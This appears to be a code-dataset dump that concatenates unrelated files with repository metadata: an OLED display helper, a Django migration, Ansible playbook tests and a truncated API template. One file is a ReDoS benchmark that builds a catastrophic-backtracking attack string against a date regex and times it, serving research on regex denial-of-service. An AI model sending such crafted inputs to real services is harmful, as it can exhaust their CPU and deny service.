] | null | null | null | from .ast_node import AST_Node, AST_Statements | 46 | 46 | 0.869565 | 8 | 46 | 4.625 | 0.625 | 0.378378 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 46 | 1 | 46 | 46 | 0.880952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
364780ad0d7bf938c1931e90b218a79c0600e71c | 6,504 | py | Python | ups_modul/inout/write_oled.py | theanhgen/ups | b3c5f776dabd8a7563098d7f91f8da842628beb5 | [
"Apache-2.0"
] | 1 | 2018-06-23T12:58:58.000Z | 2018-06-23T12:58:58.000Z | ups_modul/inout/write_oled.py | theanhgen/ups | b3c5f776dabd8a7563098d7f91f8da842628beb5 | [
"Apache-2.0"
] | null | null | null | ups_modul/inout/write_oled.py | theanhgen/ups | b3c5f776dabd8a7563098d7f91f8da842628beb5 | [
"Apache-2.0"
] | 1 | 2018-12-26T22:58:55.000Z | 2018-12-26T22:58:55.000Z | import time
import Adafruit_GPIO.SPI as SPI
import Adafruit_SSD1306
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
import subprocess
# Raspberry Pi pin configuration:
RST = 24 # on the PiOLED this pin isnt used
# Note the following are only used with SPI:
DC = 23
SPI_PORT = 0
SPI_DEVICE = 0
def write(text):
disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=23)
disp.begin()
# Clear display.
disp.clear()
disp.display()
# Create blank image for drawing.
# Make sure to create image with mode '1' for 1-bit color.
width = disp.width
height = disp.height
image = Image.new('1', (width, height))
# Get drawing object to draw on image.
draw = ImageDraw.Draw(image)
# Draw a black filled box to clear the image.
draw.rectangle((0,0,width,height), outline=0, fill=0)
# Draw some shapes.
# First define some constants to allow easy resizing of shapes.
padding = -2
top = padding
bottom = height-padding
# Move left to right keeping track of the current x position for drawing shapes.
x = 0
# Load default font.
font = ImageFont.load_default()
# Draw a black filled box to clear the image.
draw.rectangle((0,0,width,height), outline=0, fill=0)
# Write two lines of text.
draw.text((x, top), text, font=font, fill=255)
#draw.text((x, top+8), "ROMAN OUT", font=font, fill=255)
# Display image.
disp.image(image)
disp.display()
time.sleep(5)
disp.clear()
def write_2l(text, text2):
disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=23)
disp.begin()
# Clear display.
disp.clear()
disp.display()
# Create blank image for drawing.
# Make sure to create image with mode '1' for 1-bit color.
width = disp.width
height = disp.height
image = Image.new('1', (width, height))
# Get drawing object to draw on image.
draw = ImageDraw.Draw(image)
# Draw a black filled box to clear the image.
draw.rectangle((0,0,width,height), outline=0, fill=0)
# Draw some shapes.
# First define some constants to allow easy resizing of shapes.
padding = -2
top = padding
bottom = height-padding
# Move left to right keeping track of the current x position for drawing shapes.
x = 0
# Load default font.
font = ImageFont.load_default()
# Draw a black filled box to clear the image.
draw.rectangle((0,0,width,height), outline=0, fill=0)
# Write two lines of text.
draw.text((x, top), text, font=font, fill=255)
draw.text((x, top+8), text2, font=font, fill=255)
# Display image.
disp.image(image)
disp.display()
time.sleep(2.5)
def write_3l(text, text2, text3):
disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=23)
disp.begin()
# Clear display.
disp.clear()
disp.display()
# Create blank image for drawing.
# Make sure to create image with mode '1' for 1-bit color.
width = disp.width
height = disp.height
image = Image.new('1', (width, height))
# Get drawing object to draw on image.
draw = ImageDraw.Draw(image)
# Draw a black filled box to clear the image.
draw.rectangle((0,0,width,height), outline=0, fill=0)
# Draw some shapes.
# First define some constants to allow easy resizing of shapes.
padding = -2
top = padding
bottom = height-padding
# Move left to right keeping track of the current x position for drawing shapes.
x = 0
# Load default font.
font = ImageFont.load_default()
# Draw a black filled box to clear the image.
draw.rectangle((0,0,width,height), outline=0, fill=0)
# Write two lines of text.
draw.text((x, top), text, font=font, fill=255)
draw.text((x, top+8), text2, font=font, fill=255)
draw.text((x, top+16), text3, font=font, fill=255)
# Display image.
disp.image(image)
disp.display()
time.sleep(3)
def write_4l(text, text2, text3, text4):
disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=23)
disp.begin()
# Clear display.
disp.clear()
disp.display()
# Create blank image for drawing.
# Make sure to create image with mode '1' for 1-bit color.
width = disp.width
height = disp.height
image = Image.new('1', (width, height))
# Get drawing object to draw on image.
draw = ImageDraw.Draw(image)
# Draw a black filled box to clear the image.
draw.rectangle((0,0,width,height), outline=0, fill=0)
# Draw some shapes.
# First define some constants to allow easy resizing of shapes.
padding = -2
top = padding
bottom = height-padding
# Move left to right keeping track of the current x position for drawing shapes.
x = 0
# Load default font.
font = ImageFont.load_default()
# Draw a black filled box to clear the image.
draw.rectangle((0,0,width,height), outline=0, fill=0)
# Write two lines of text.
draw.text((x, top), text, font=font, fill=255)
draw.text((x, top+8), text2, font=font, fill=255)
draw.text((x, top+16), text3, font=font, fill=255)
draw.text((x, top+24), text4, font=font, fill=255)
# Display image.
disp.image(image)
disp.display()
time.sleep(2.5)
def write_top4(top4):
disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=23)
disp.begin()
# Clear display.
disp.clear()
disp.display()
# Create blank image for drawing.
# Make sure to create image with mode '1' for 1-bit color.
width = disp.width
height = disp.height
image = Image.new('1', (width, height))
# Get drawing object to draw on image.
draw = ImageDraw.Draw(image)
# Draw a black filled box to clear the image.
draw.rectangle((0,0,width,height), outline=0, fill=0)
# Draw some shapes.
# First define some constants to allow easy resizing of shapes.
padding = -2
top = padding
bottom = height-padding
# Move left to right keeping track of the current x position for drawing shapes.
x = 0
# Load default font.
font = ImageFont.load_default()
# Draw a black filled box to clear the image.
draw.rectangle((0,0,width,height), outline=0, fill=0)
# Write two lines of text.
for i, text in enumerate(top4):
draw.text((x, top + 8 * i), text, font=font, fill=255)
# Display image.
disp.image(image)
disp.display()
time.sleep(0)
| 25.40625 | 84 | 0.642681 | 977 | 6,504 | 4.249744 | 0.114637 | 0.052987 | 0.026012 | 0.034682 | 0.907514 | 0.90342 | 0.90342 | 0.90342 | 0.90053 | 0.90053 | 0 | 0.045455 | 0.249077 | 6,504 | 255 | 85 | 25.505882 | 0.804668 | 0.369157 | 0 | 0.815126 | 0 | 0 | 0.001238 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042017 | false | 0 | 0.058824 | 0 | 0.10084 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
368c1de20d72a70e622e327173ec4d0e479b4925 | 1,439 | py | Python | bounties_api/std_bounties/migrations/0022_auto_20190401_1856.py | tenthirtyone/BountiesAPI | 2bb449a947d987072be24633ba36fbd67c0ab29b | [
"MIT"
] | 45 | 2018-03-24T21:37:59.000Z | 2021-11-12T11:53:04.000Z | bounties_api/std_bounties/migrations/0022_auto_20190401_1856.py | tenthirtyone/BountiesAPI | 2bb449a947d987072be24633ba36fbd67c0ab29b | [
"MIT"
] | 192 | 2018-03-15T22:42:51.000Z | 2022-02-12T11:42:20.000Z | bounties_api/std_bounties/migrations/0022_auto_20190401_1856.py | tenthirtyone/BountiesAPI | 2bb449a947d987072be24633ba36fbd67c0ab29b | [
"MIT"
] | 27 | 2018-03-23T17:12:27.000Z | 2021-12-06T02:21:26.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-04-01 18:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('std_bounties', '0021_auto_20190401_1836'),
]
operations = [
migrations.AlterField(
model_name='bounty',
name='attached_data_hash',
field=models.CharField(blank=True, max_length=256, null=True),
),
migrations.AlterField(
model_name='bounty',
name='attached_filename',
field=models.CharField(blank=True, max_length=256, null=True),
),
migrations.AlterField(
model_name='bounty',
name='attached_url',
field=models.CharField(blank=True, max_length=256, null=True),
),
migrations.AlterField(
model_name='draftbounty',
name='attached_data_hash',
field=models.CharField(blank=True, max_length=256, null=True),
),
migrations.AlterField(
model_name='draftbounty',
name='attached_filename',
field=models.CharField(blank=True, max_length=256, null=True),
),
migrations.AlterField(
model_name='draftbounty',
name='attached_url',
field=models.CharField(blank=True, max_length=256, null=True),
),
]
| 31.282609 | 74 | 0.594163 | 148 | 1,439 | 5.581081 | 0.337838 | 0.145278 | 0.181598 | 0.210654 | 0.761501 | 0.761501 | 0.761501 | 0.719128 | 0.719128 | 0.719128 | 0 | 0.050881 | 0.289785 | 1,439 | 45 | 75 | 31.977778 | 0.757339 | 0.04795 | 0 | 0.789474 | 1 | 0 | 0.131675 | 0.016825 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
3d112726d56b3bbf57dac8f790b9e396da1944fb | 1,851 | py | Python | util/logo.py | siekmanj/rrl_tmp | 247e1cbde3e5fdc2c1c72e31c52b3d08c9d68cf1 | [
"CC0-1.0"
] | 30 | 2020-05-01T16:11:33.000Z | 2022-02-21T08:23:58.000Z | util/logo.py | siekmanj/rrl_tmp | 247e1cbde3e5fdc2c1c72e31c52b3d08c9d68cf1 | [
"CC0-1.0"
] | 2 | 2020-11-29T23:01:02.000Z | 2021-05-26T20:57:23.000Z | util/logo.py | siekmanj/rrl_tmp | 247e1cbde3e5fdc2c1c72e31c52b3d08c9d68cf1 | [
"CC0-1.0"
] | 3 | 2020-09-01T03:16:25.000Z | 2021-04-02T19:33:54.000Z | class color:
BOLD = '\033[1m\033[48m'
END = '\033[0m'
ORANGE = '\033[38;5;202m'
BLACK = '\033[38;5;240m'
def print_logo(subtitle=""):
print(color.BOLD, end="")
print(color.ORANGE, end="")
print(" @@@@@@@@@@@@@/ ")
print(" * #@@@ ")
print("#@@@@@@@@@@@@&%/. .@@@, *@@@@% ")
print("#@@@@@@@@@@@@@@@@@@@@/ &@@( *@@@@% ")
print("#@@@@/ /@@@@@@* %@@& *@@@@% ")
print("#@@@@/ *@@@@@. ,@@@# *@@@@% ")
print("#@@@@/ @@@@@/ %@@@, *@@@@% ")
print("#@@@@/ .@@@@@, *@@@# *@@@@% ")
print("#@@@@/ *@@@@@( @@@@@@@@@@@@@@@* *@@@@% ")
print("#@@@@@&&&&&&@@@@@@@@@( *@@@@% ")
print("#@@@@@@@@@@@@@@@@@@* *@@@@% ")
print("#@@@@/ ,@@@@@& *@@@@% ")
print("#@@@@/ .@@@@@/ *@@@@% ")
print("#@@@@/ #@@@@% *@@@@% ")
print("#@@@@/ *@@@@@ *@@@@% ")
print("#@@@@/ .@@@@@, *@@@@&((((((((((((((((((")
print("#@@@@/ &@@@@( *@@@@@@@@@@@@@@@@@@@@@@@")
print(color.END)
print(subtitle + "\n\n")
| 63.827586 | 99 | 0.126418 | 56 | 1,851 | 4.160714 | 0.339286 | 0.729614 | 1.030043 | 1.287554 | 0.386266 | 0.386266 | 0.386266 | 0.386266 | 0.386266 | 0.386266 | 0 | 0.040312 | 0.584549 | 1,851 | 28 | 100 | 66.107143 | 0.262679 | 0 | 0 | 0 | 0 | 0 | 0.763911 | 0.049703 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0 | 0 | 0.222222 | 0.814815 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
3d31f93224c032969abe10ecf84dbdbd1e5b3e44 | 299 | py | Python | src/prism-fruit/Games-DQL/examples/games/car/networkx/algorithms/assortativity/__init__.py | kushgrover/apt-vs-dift | 250f64e6c442f6018cab65ec6979d9568a842f57 | [
"MIT"
] | null | null | null | src/prism-fruit/Games-DQL/examples/games/car/networkx/algorithms/assortativity/__init__.py | kushgrover/apt-vs-dift | 250f64e6c442f6018cab65ec6979d9568a842f57 | [
"MIT"
] | null | null | null | src/prism-fruit/Games-DQL/examples/games/car/networkx/algorithms/assortativity/__init__.py | kushgrover/apt-vs-dift | 250f64e6c442f6018cab65ec6979d9568a842f57 | [
"MIT"
] | null | null | null | from networkx.algorithms.assortativity.connectivity import *
from networkx.algorithms.assortativity.correlation import *
from networkx.algorithms.assortativity.mixing import *
from networkx.algorithms.assortativity.neighbor_degree import *
from networkx.algorithms.assortativity.pairs import *
| 49.833333 | 64 | 0.849498 | 31 | 299 | 8.16129 | 0.354839 | 0.237154 | 0.434783 | 0.6917 | 0.648221 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083612 | 299 | 5 | 65 | 59.8 | 0.923358 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3d4c536a274d0ef52f88c3266454fdc2eb729bf4 | 4,884 | py | Python | regexlib/python_re_test_file/regexlib_2831.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | 1 | 2022-01-24T14:43:23.000Z | 2022-01-24T14:43:23.000Z | regexlib/python_re_test_file/regexlib_2831.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | null | null | null | regexlib/python_re_test_file/regexlib_2831.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | null | null | null | # 2831
# ^(?:(?:(?:(?:[1-2][0-9]{3}) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]))|(?:(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) *(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3}))))|(?:(?:(?:(?:[1-2][0-9]{3}) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]))|(?:(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) *(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))) *(?:(?:(?:1[0-2]|0?[1-9])(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))?(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))? *(?:(?i:[ap]m)))|(?:(?:2[0-3]|[01]?[0-9])(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))?))))$
# POLYNOMIAL
# nums:4
# POLYNOMIAL AttackString:"10"+" "*5000+"!1 __POA(i)"
import re
from time import perf_counter
regex = """^(?:(?:(?:(?:[1-2][0-9]{3}) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]))|(?:(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) *(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3}))))|(?:(?:(?:(?:[1-2][0-9]{3}) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]))|(?:(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) *(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))) *(?:(?:(?:1[0-2]|0?[1-9])(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))?(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))? *(?:(?i:[ap]m)))|(?:(?:2[0-3]|[01]?[0-9])(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))?))))$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
ATTACK = "10" + " " * i * 10000 + "!1 __POA(i)"
LEN = len(ATTACK)
BEGIN = perf_counter()
m = REGEX.search(ATTACK)
# m = REGEX.match(ATTACK)
DURATION = perf_counter() - BEGIN
print(f"{i *10000}: took {DURATION} seconds!") | 257.052632 | 2,234 | 0.326986 | 903 | 4,884 | 1.760797 | 0.080842 | 0.103145 | 0.075472 | 0.050314 | 0.833962 | 0.833962 | 0.833962 | 0.833962 | 0.833962 | 0.833962 | 0 | 0.151 | 0.048116 | 4,884 | 19 | 2,235 | 257.052632 | 0.191009 | 0.474816 | 0 | 0 | 0 | 0.090909 | 0.887065 | 0.690113 | 0.090909 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0.090909 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
181bb14ed46df7ff91e79ad0c079c2ef45e1523b | 1,623 | py | Python | tests/test_check_playbook_file_removed_and_added.py | deperrone/content | caaff27f01a1d6c15da461f9fafe26090e8fdd18 | [
"BSD-3-Clause"
] | 1,138 | 2018-09-05T06:31:44.000Z | 2022-03-31T03:38:24.000Z | tests/test_check_playbook_file_removed_and_added.py | deperrone/content | caaff27f01a1d6c15da461f9fafe26090e8fdd18 | [
"BSD-3-Clause"
] | 4,743 | 2018-09-04T15:14:04.000Z | 2022-03-31T23:17:57.000Z | tests/test_check_playbook_file_removed_and_added.py | deperrone/content | caaff27f01a1d6c15da461f9fafe26090e8fdd18 | [
"BSD-3-Clause"
] | 400 | 2018-09-08T20:08:49.000Z | 2022-03-30T20:54:32.000Z | import os
import pytest
from .test_ansible_file_removed_and_added import check_playbook_file_removed_and_added
def test_file_removed_and_added():
playbook_path = os.path.join(os.path.dirname(__file__),
"ansible_file_removed_and_added",
"file_removed_and_added.yml")
assert not check_playbook_file_removed_and_added(playbook_path)
def test_file_removed_and_not_added():
playbook_path = os.path.join(os.path.dirname(__file__),
"ansible_file_removed_and_added",
"file_removed_and_not_added.yml")
assert check_playbook_file_removed_and_added(playbook_path)
def test_file_not_removed_and_added():
playbook_path = os.path.join(os.path.dirname(__file__),
"ansible_file_removed_and_added",
"file_not_removed_and_added.yml")
assert check_playbook_file_removed_and_added(playbook_path)
def test_file_block_removed_and_added():
playbook_path = os.path.join(os.path.dirname(__file__),
"ansible_file_removed_and_added",
"file_block_removed_and_added.yml")
assert not check_playbook_file_removed_and_added(playbook_path)
def test_file_block_removed_and_not_added():
playbook_path = os.path.join(os.path.dirname(__file__),
"ansible_file_removed_and_added",
"file_block_removed_and_not_added.yml")
assert check_playbook_file_removed_and_added(playbook_path)
| 40.575 | 86 | 0.666051 | 200 | 1,623 | 4.755 | 0.1 | 0.231335 | 0.283912 | 0.279706 | 0.964248 | 0.912723 | 0.874869 | 0.874869 | 0.874869 | 0.874869 | 0 | 0 | 0.268638 | 1,623 | 39 | 87 | 41.615385 | 0.801179 | 0 | 0 | 0.535714 | 0 | 0 | 0.187307 | 0.187307 | 0 | 0 | 0 | 0 | 0.178571 | 1 | 0.178571 | false | 0 | 0.107143 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
1821fc50c5fa639d7564c9223f89a140a640a726 | 15,539 | py | Python | django_eve_data/esi_api/markets.py | SvenMatzke/EveData | a890c5bf4197f63092938de5d35c63054e0bb18c | [
"MIT"
] | 1 | 2017-02-26T20:34:11.000Z | 2017-02-26T20:34:11.000Z | django_eve_data/esi_api/markets.py | SvenMatzke/eve_data | a890c5bf4197f63092938de5d35c63054e0bb18c | [
"MIT"
] | null | null | null | django_eve_data/esi_api/markets.py | SvenMatzke/eve_data | a890c5bf4197f63092938de5d35c63054e0bb18c | [
"MIT"
] | null | null | null | # coding utf-8
"""
Autogenerated Template File
"""
from .base import EsiRequestObject
class MarketsDetailOrders(object):
base_url = "https://esi.tech.ccp.is/latest/markets/{region_id}/orders/"
get_responses = {'500': {'schema': {'type': 'object', 'properties': {'error': {'type': 'string', 'description': 'Internal server error message', 'title': 'get_markets_region_id_orders_500_internal_server_error'}}, 'description': 'Internal server error', 'title': 'get_markets_region_id_orders_internal_server_error'}, 'examples': {'application/json': {'error': "uncaught exception: IOError('out of memory')"}}, 'description': 'Internal server error'}, '200': {'schema': {'items': {'title': 'get_markets_region_id_orders_200_ok', 'type': 'object', 'properties': {'duration': {'format': 'int32', 'type': 'integer', 'description': 'duration integer', 'title': 'get_markets_region_id_orders_duration'}, 'price': {'format': 'float', 'type': 'number', 'description': 'price number', 'title': 'get_markets_region_id_orders_price'}, 'location_id': {'format': 'int64', 'type': 'integer', 'description': 'location_id integer', 'title': 'get_markets_region_id_orders_location_id'}, 'min_volume': {'format': 'int32', 'type': 'integer', 'description': 'min_volume integer', 'title': 'get_markets_region_id_orders_min_volume'}, 'range': {'enum': ['station', 'region', 'solarsystem', '1', '2', '3', '4', '5', '10', '20', '30', '40'], 'type': 'string', 'description': 'range string', 'title': 'get_markets_region_id_orders_range'}, 'issued': {'format': 'date-time', 'type': 'string', 'description': 'issued string', 'title': 'get_markets_region_id_orders_issued'}, 'is_buy_order': {'type': 'boolean', 'description': 'is_buy_order boolean', 'title': 'get_markets_region_id_orders_is_buy_order'}, 'order_id': {'format': 'int64', 'type': 'integer', 'description': 'order_id integer', 'title': 'get_markets_region_id_orders_order_id'}, 'volume_total': {'format': 'int32', 'type': 'integer', 'description': 'volume_total integer', 'title': 'get_markets_region_id_orders_volume_total'}, 'volume_remain': {'format': 'int32', 'type': 'integer', 'description': 'volume_remain integer', 'title': 'get_markets_region_id_orders_volume_remain'}, 'type_id': {'format': 'int32', 'type': 'integer', 'description': 'type_id integer', 'title': 'get_markets_region_id_orders_type_id'}}, 'description': '200 ok object', 'required': ['order_id', 'type_id', 'location_id', 'volume_total', 'volume_remain', 'min_volume', 'price', 'is_buy_order', 'duration', 'issued', 'range']}, 'type': 'array', 'description': '200 ok array', 'title': 'get_markets_region_id_orders_ok'}, 'examples': {'application/json': [{'duration': 90, 'price': 9.9, 'location_id': 60005599, 'min_volume': 1, 'range': 'region', 'issued': '2016-09-03T05:12:25Z', 'is_buy_order': False, 'order_id': 4623824223, 'volume_total': 2000000, 'volume_remain': 1296000, 'type_id': 34}]}, 'headers': {'Expires': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}, 'Cache-Control': {'type': 'string', 'description': 'The caching mechanism used'}, 'Last-Modified': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}}, 'description': 'A list of orders'}, '422': {'schema': {'type': 'object', 'properties': {'error': {'type': 'string', 